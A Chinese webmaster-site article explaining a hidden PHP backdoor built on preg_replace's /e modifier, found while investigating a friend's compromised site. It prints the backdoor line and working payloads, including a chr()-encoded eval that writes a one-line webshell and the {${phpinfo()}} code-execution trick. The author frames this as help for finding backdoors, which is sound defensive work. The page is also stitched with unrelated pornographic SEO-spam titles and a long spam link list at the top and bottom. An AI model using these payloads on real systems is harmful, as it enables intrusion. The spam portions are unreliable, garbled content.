青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 腳本攻防 查看內(nèi)容

記一次發(fā)現(xiàn)利用preg_replace隱藏后門和后續(xù)探究

2022-9-27 08:54| 查看: 2248 |來源: 互聯(lián)網(wǎng)

事情是這樣的,朋友的網(wǎng)站的利用各種查找后門的工具都沒有發(fā)現(xiàn)php木馬。老是找不到,小黑的伎倆很高級,每次使用完畢總是把后門刪掉,但是每次都能繼續(xù)進來,總是找不到從哪進來的。這個著實讓人蛋疼。 后來,

事情是這樣的,朋友的網(wǎng)站的利用各種查找后門的工具都沒有發(fā)現(xiàn)php木馬。老是找不到,小黑的伎倆很高級,每次使用完畢總是把后門刪掉,但是每次都能繼續(xù)進來,總是找不到從哪進來的。這個著實讓人蛋疼。
 
后來,終于在日志中發(fā)現(xiàn)一絲蛛絲馬跡,通過我的分析,我發(fā)現(xiàn)一個IP總是很奇怪的POST數(shù)據(jù)到某個文件。然后一段時間后,此IP就訪問一個莫名奇妙文件,名字很顯眼明顯不是正常系統(tǒng)文件,而是PHP后門。但是很快使用完畢后門就被刪除了。
 
哈哈,遇到小黑蠻細心的。
 
然后通過分析發(fā)現(xiàn),小黑的訪問的文件發(fā)現(xiàn)代碼:
 
@preg_replace(“//e”,$_POST['IN_COMSENZ'],”Access Denied”);
 
如果你看到這個代碼是不是有的也沒什么問題,但是,這個就是小黑的掩藏的惡意代碼和后門。隱蔽吧,基本上任何查殺軟件都查殺不到。
 
preg_replace函數(shù)原型:
 
mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
 
特別說明:
 
/e 修正符使 preg_replace() 將 replacement 參數(shù)當作 PHP 代碼(在適當?shù)哪嫦蛞锰鎿Q完之后)。提示:要確保 replacement 構(gòu)成一個合法的 PHP 代碼字符串,否則 PHP 會在報告在包含 preg_replace() 的行中出現(xiàn)語法解析錯誤。
 
上面的代碼是POST接受數(shù)據(jù)要測試,比較麻煩,如果換成GET獲取數(shù)據(jù)的話。。。
 
舉例:
 
 echo preg_replace(“/test/e”,$_GET["h"],”jutst test”);
 
如果我們提交?h=phpinfo(),phpinfo()將會被執(zhí)行(使用/e修飾符,preg_replace會將 replacement 參數(shù)當作 PHP 代碼執(zhí)行)。
 
如果我們要POST的話,我們測試提交下面的代碼會怎么樣呢?
 
h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
 
密文對應(yīng)的明文是:
 
fputs(fopen(data/a.php,w),);
 
執(zhí)行的結(jié)果是在/data/目錄下生成一個一句話木馬文件 a.php。
 
這個就恐怖了吧。。。。
 
再來一個有難度的例子:
 
 代碼如下:
function test($str)
{
}
echo preg_replace(“/s*[php](.+?)[/php]s*/ies”, ‘test(“\1″)’, $_GET["h"]);
?>

提交 ?h=phpinfo() ,phpinfo()會被執(zhí)行嗎?
 
肯定不會。因為經(jīng)過正則匹配后, replacement 參數(shù)變?yōu)椤痶est(“phpinfo”)’,此時phpinfo僅是被當做一個字符串參數(shù)了。
 
有沒有辦法讓它執(zhí)行呢?
 
當然有。在這里我們?nèi)绻峤?h={${phpinfo()}},phpinfo()就會被執(zhí)行。為什么呢?
 
在php中,雙引號里面如果包含有變量,php解釋器會將其替換為變量解釋后的結(jié)果;單引號中的變量不會被處理。
 
注意:雙引號中的函數(shù)不會被執(zhí)行和替換。
 
在這里我們需要通過{${}}構(gòu)造出了一個特殊的變量,’test(“{${phpinfo()}}”)’,達到讓函數(shù)被執(zhí)行的效果(${phpinfo()}會被解釋執(zhí)行)。
 
可以先做如下測試:
 
echo “{${phpinfo()}}”; phpinfo會被成功執(zhí)行了。
 
所以,各位查找后門的時候注意查找下。
 
OK,說了那么多,也了解了,以上我給的代碼:
 
 @preg_replace(“//e”,$_POST['IN_COMSENZ'],”Access Denied”);
 
看似很正常的代碼,其實就是一個極度危險的代碼,隱藏頗深啊。哈哈。希望對大家有幫助
 
作者:合肥制造

本文最后更新于 2022-9-27 08:54,某些文章具有時效性,若有錯誤或已失效,請在網(wǎng)站留言或聯(lián)系站長:[email protected]
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學習與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 超级最爽的乱淫片免费 | 亚洲精品久久久久无码AV片软件 | 持田香织abc | xxxx69日本| 国产在线播放91 | 亚洲 成人网 | 国产一区二区在线观看免费 | 日韩精品免费一区二区 | 看黄色片子| 日韩精品欧美在线视频在线 | 亚洲色综合中文字幕在线 | 国产精品久久久久影院 | 亚洲精品久久久无码 | 99re6久久在热线视频 | 99久久伊人一区二区yy5099 | 毛片网站视频 | 办公室中文BD | 女人十八毛片水真多啊 | 香蕉久久夜色精品国产小优 | 香蕉久久日日躁夜夜嗓 | 2020国产成人精品免费视频 | 做i爱视频30分钟免费 | 2021国产精品久久久久精品免费网 | 精品国产手机视频在在线 | 男人J放进女人屁股免费观看 | 伊人久久亚洲精品一区 | 99精品免费在线观看 | 区一区二视频免费观看 | 亚洲视频黄 | 久久本道久久综合伊人 | 大屁股妇女流出白浆 | 在线中文字幕 | 中文字幕亚洲欧美日韩2019 | 久久综合丁香激情久久 | 麻豆高清区在线 | 男生J桶进女人P又色又爽又黄 | 国产精品成人网 | 中国少妇内射XXXX狠干 | 国产又粗又猛又爽又黄的免费视频 | 国内精品视频一区二区在线观看 | 大屁股妇女流出白浆 |